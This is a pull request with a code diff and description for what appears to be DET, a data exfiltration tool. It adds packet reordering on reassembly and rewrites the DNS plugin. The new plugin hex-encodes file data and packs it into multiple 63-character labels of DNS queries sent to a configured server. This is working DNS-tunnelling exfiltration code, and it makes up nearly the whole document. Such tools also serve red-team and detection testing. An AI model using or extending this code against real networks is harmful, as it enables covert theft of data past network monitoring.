### PR TITLE
Packet reordering / packet loss handling / DNS plugin improvement

### DIFF
--- a/det.py
+++ b/det.py
@@ -189,6 +189,9 @@ class Exfiltration(object):
         fname = files[jobid]['filename']
         filename = "%s.%s" % (fname.replace(
             os.path.pathsep, ''), time.strftime("%Y-%m-%d.%H:%M:%S", time.gmtime()))
+        #Reorder packets before reassembling / ugly one-liner hack
+        files[jobid]['packets_number'], files[jobid]['data'] = \
+                [list(x) for x in zip(*sorted(zip(files[jobid]['packets_number'], files[jobid]['data'])))]
         content = ''.join(str(v) for v in files[jobid]['data']).decode('hex')
         content = aes_decrypt(content, self.KEY)
         if COMPRESSION:
@@ -222,7 +225,7 @@ class Exfiltration(object):
                     # making sure there's a jobid for this file
                     if (jobid in files and message[1] not in files[jobid]['packets_number']):
                         files[jobid]['data'].append(''.join(message[2:]))
-                        files[jobid]['packets_number'].append(message[1])
+                        files[jobid]['packets_number'].append(int(message[1]))
         except:
             raise
             pass

--- a/plugins/dns.py
+++ b/plugins/dns.py
@@ -8,7 +8,6 @@ app_exfiltrate = None
 config = None
 buf = {}
 
-
 def handle_dns_packet(x):
     global buf
     try:
@@ -16,41 +15,64 @@ def handle_dns_packet(x):
         if (config['key'] in qname):
             app_exfiltrate.log_message(
                 'info', '[dns] DNS Query: {0}'.format(qname))
-            data = qname.split(".")[0]
-            jobid = data[0:7]
-            data = data.replace(jobid, '')
+            jobid = qname[0:7]
+            data = ''.join(qname[7:].replace(config['key'], '').split('.'))
             # app_exfiltrate.log_message('info', '[dns] jobid = {0}'.format(jobid))
             # app_exfiltrate.log_message('info', '[dns] data = {0}'.format(data))
             if jobid not in buf:
                 buf[jobid] = []
             if data not in buf[jobid]:
                 buf[jobid].append(data)
-            if (len(qname) < 68):
+            #Handle the case where the last label's length == 1
+            last_label_len = (252 - len(config['key'])) % 64
+            max_query = 252 if last_label_len == 1 else 253
+            if (len(qname) < max_query):
                 app_exfiltrate.retrieve_data(''.join(buf[jobid]).decode('hex'))
                 buf[jobid] = []
     except Exception, e:
         # print e
         pass
 
-
+#Send data over multiple labels (RFC 1034)
+#Max query is 253 characters long (textual representation)
+#Max label length is 63 bytes
 def send(data):
     target = config['target']
     port = config['port']
     jobid = data.split("|!|")[0]
     data = data.encode('hex')
+    domain = ""
+
+    #Calculate the remaining length available for our payload
+    rem = 252 - len(config['key'])
+    #Number of 63 bytes labels
+    no_labels = rem / 64 #( 63 + len('.') )
+    #Length of the last remaining label
+    last_label_len = (rem % 64) - 1
+
     while data != "":
-        tmp = data[:66 - len(config['key']) - len(jobid)]
-        data = data.replace(tmp, '')
-        domain = "{0}{1}.{2}".format(jobid, tmp, config['key'])
-        app_exfiltrate.log_message(
-            'info', "[dns] Sending {0} to {1}".format(domain, target))
+        data = jobid + data
+        for i in range(0, no_labels):
+            if data == "": break
+            label = data[:63]
+            data = data[63:]
+            domain += label + '.'
+        if data == "":
+            domain += config['key']
+        else:
+            if last_label_len < 1:
+                domain += config['key']
+            else:
+                label = data[:last_label_len]
+                data = data[last_label_len:]
+                domain += label + '.' + config['key']
         q = DNSRecord.question(domain)
+        domain = ""
         try:
             q.send(target, port, timeout=0.01)
         except:
             # app_exfiltrate.log_message('warning', "[dns] Failed to send DNS request")
             pass
-
 
 def listen():
     app_exfiltrate.log_message(


### PR DESCRIPTION
These changes aim to circumvent some problems that may occur when packets don't arrive in the right order (due to network latencies or short sleep times):

- The first commit is for reordering the intermediate packets upon receival of the last ("done") packet.
- The second commit handles the case when the last ("done") packet arrives while some intermediate packets are still on their way to the server: In this case, the last packet's id is used to deduce the number of packets composing the entire message, and the retrieve_file() function can be called when this number is met.

Other changes (3rd commit) are improvements for the DNS plugin. The current implementation sends data over DNS queries of 61 characters minus len(key), which issues a large number of DNS queries for each sent chunk of the file to exfiltrate.
The changes made were inspired by RFC 1034, and the idea is to encode payload on multiple labels of (max.) 63 characters in order to make use of all the (253 chars) available space. DNS queries will look something like this:

|--------------------Payload-------------------|
[63 chars].[63 chars].[63 chars].[x chars].example.com

Depending on the domain name and the length of the payload, the number of 63-chars labels and the length of the x-chars label may vary. Since the queries are maximal, we know we received all the data when the query length is less than 253 chars, and that's when we call retrieve_data() function. The singular case where 0 bytes are left for the last label (x-chars label), the latter will be omitted (otherwise we'll have stuff..example.com which is useless to encode data and which I doubt being very DNS compliant): In this case the queries max length will be 252 chars.